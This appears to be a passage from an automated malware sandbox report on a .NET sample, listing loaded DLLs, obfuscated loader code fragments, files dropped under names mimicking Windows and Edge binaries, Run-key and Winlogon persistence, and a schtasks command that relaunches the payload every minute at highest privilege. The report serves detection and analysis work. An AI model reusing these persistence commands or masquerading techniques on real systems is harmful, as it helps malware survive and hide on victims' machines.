                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: version.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: uxtheme.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: windows.storage.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wldp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: profapi.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: cryptsp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: rsaenh.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: cryptbase.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: sspicli.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ktmw32.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ntmarta.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wbemcomn.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: amsi.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: userenv.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: propsys.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: dlnashext.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wpdshext.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: edputil.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: urlmon.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: iertutil.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: srvcli.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: netutils.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wintypes.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: appresolver.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: bcp47langs.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: slc.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: sppc.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDirectory created: C:\Program Files\Windows Mail\System.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDirectory created: C:\Program Files\Windows Mail\27d1bcfc3c54e0
                                    Source: HaLCYOFjMN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: HaLCYOFjMN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rqbprm.exe, 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp, rqbprm.exe, 00000018.00000000.2086918365.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS._234nLbzVuExiDNZObLL22E7xwVsqGGV999AKpbmRIin,OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS.muGZUarLXlanrCKKJbZDMeDLtshQRpHIaMcQ3nlNZ4Z,OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS.wHAxPhmE2TuZ86q2i0vOsLxOqLnhz3fXBOAoBMot0JE,OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS.Fc89VNqxkSWFPgKDrSqpyhcms67VUVGqkaHUPIphq57,XNIJZHKIRB1ZVtDdGV.I4kK5OGSRLVcM6QXX6()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{dbfkZV3Ua3Gy5hYteXcioHnzE59dJEqzOO9qWXpBmG2QOFL7jGMRPnBcImEcTOLx1y77NfHOVPiK[2],XNIJZHKIRB1ZVtDdGV.XPIq0igHytXud0Hj1Q(Convert.FromBase64String(dbfkZV3Ua3Gy5hYteXcioHnzE59dJEqzOO9qWXpBmG2QOFL7jGMRPnBcImEcTOLx1y77NfHOVPiK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: axdDR0xAkiCvl0KrBWTh4wYdtYdLie5fLnPMLVBuigySPWm2WMkPzewYELNKiSie4drRdcCfVaum System.AppDomain.Load(byte[])
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: sUd9nLAGfFoDv8kMUPJO5ZyzwFQF3wqnvaklNBZo1qSsQt5fwxLlcD2I6KFEVOGMkUQCEuFqNuGL System.AppDomain.Load(byte[])
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: sUd9nLAGfFoDv8kMUPJO5ZyzwFQF3wqnvaklNBZo1qSsQt5fwxLlcD2I6KFEVOGMkUQCEuFqNuGL
                                    Source: cnvwov.EXE.5.drStatic PE information: 0xB86EFD41 [Fri Jan 20 10:38:57 2068 UTC]
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeFile created: C:\agentwebreviewDhcp\__tmp_rar_sfx_access_check_4498921
                                    Source: rqbprm.exe.5.drStatic PE information: section name: .didat
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC33D2A5 pushad ; iretd 8_2_00007FFAAC33D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC37D2A5 pushad ; iretd 11_2_00007FFAAC37D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC562316 push 8B485F91h; iretd 11_2_00007FFAAC56231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC36D2A5 pushad ; iretd 14_2_00007FFAAC36D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC4819F2 pushad ; ret 14_2_00007FFAAC4819F9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC552316 push 8B485F92h; iretd 14_2_00007FFAAC55231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC37D2A5 pushad ; iretd 16_2_00007FFAAC37D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC562316 push 8B485F91h; iretd 16_2_00007FFAAC56231B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F640 push ecx; ret 24_2_00C7F653
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7EB78 push eax; ret 24_2_00C7EB96
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXECode function: 25_2_00007FFAAC48456C push cs; retf 25_2_00007FFAAC48456F
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXECode function: 25_2_00007FFAAC48715D push E95BDCDAh; ret 25_2_00007FFAAC487199
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeCode function: 33_2_00007FFAAC86C916 push esp; iretd 33_2_00007FFAAC86C919
                                    Source: HaLCYOFjMN.exe, n1qW0yd4NEI3jjygz3.csHigh entropy of concatenated method names: 'uddyVnktqcySyVjML7', '_7WJMLwkw7P9cu5vGDi', 'aIWhFbYhrVtWCjhohw', 'jj2Bw89A35aUj1DUc5uJCHnBQhPdQ8ynTsr4', '_1PV8hdrkBcHCEH89AQHua4CsQKHUhqNdDSpA', 'z2ShzOfBq1nO6F7c3iPO5Ig6HfNoDTuI6Q4i', 'ZppwzhVRBjv2H9fOzCHF9OBcneUnCuNCac9E', 'FtCa1bPab1rxeO7NHpRAflf3T9P0m4d5qGdG', 'ar0XMNZ4BhS0jLOo80ELl4ZUHO9GVv7XYdVf', 'Urv0XzqYP1lEUKhLhefpFCVQWYsYeu88xQC3'

                                    Persistence and Installation Behavior

                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\MwyHCbxj.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\gOlnWgHy.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\mGNMzMMn.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\agentwebreviewDhcp\WmiPrvSE.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\nuSUkZIl.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe File created: C:\Users\user\AppData\Roaming\Update.exe
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe File created: C:\agentwebreviewDhcp\portBrowserweb.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\WfRXmDCR.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\IJgIaehv.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Program Files\Windows Mail\System.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\zXoALCrI.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\hLMvsgWt.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\AppData\Roaming\Update.exe.exe (copy)
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe File created: C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\poUkcZma.log
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe File created: C:\Users\user\AppData\Local\Temp\cnvwov.EXE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\cXuwPjHF.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\RjQGfYMX.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\yaMsqCcN.log
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe File created: C:\Users\user\Desktop\vphcjoRU.log

                                    Boot Survival

                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run portBrowserweb
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
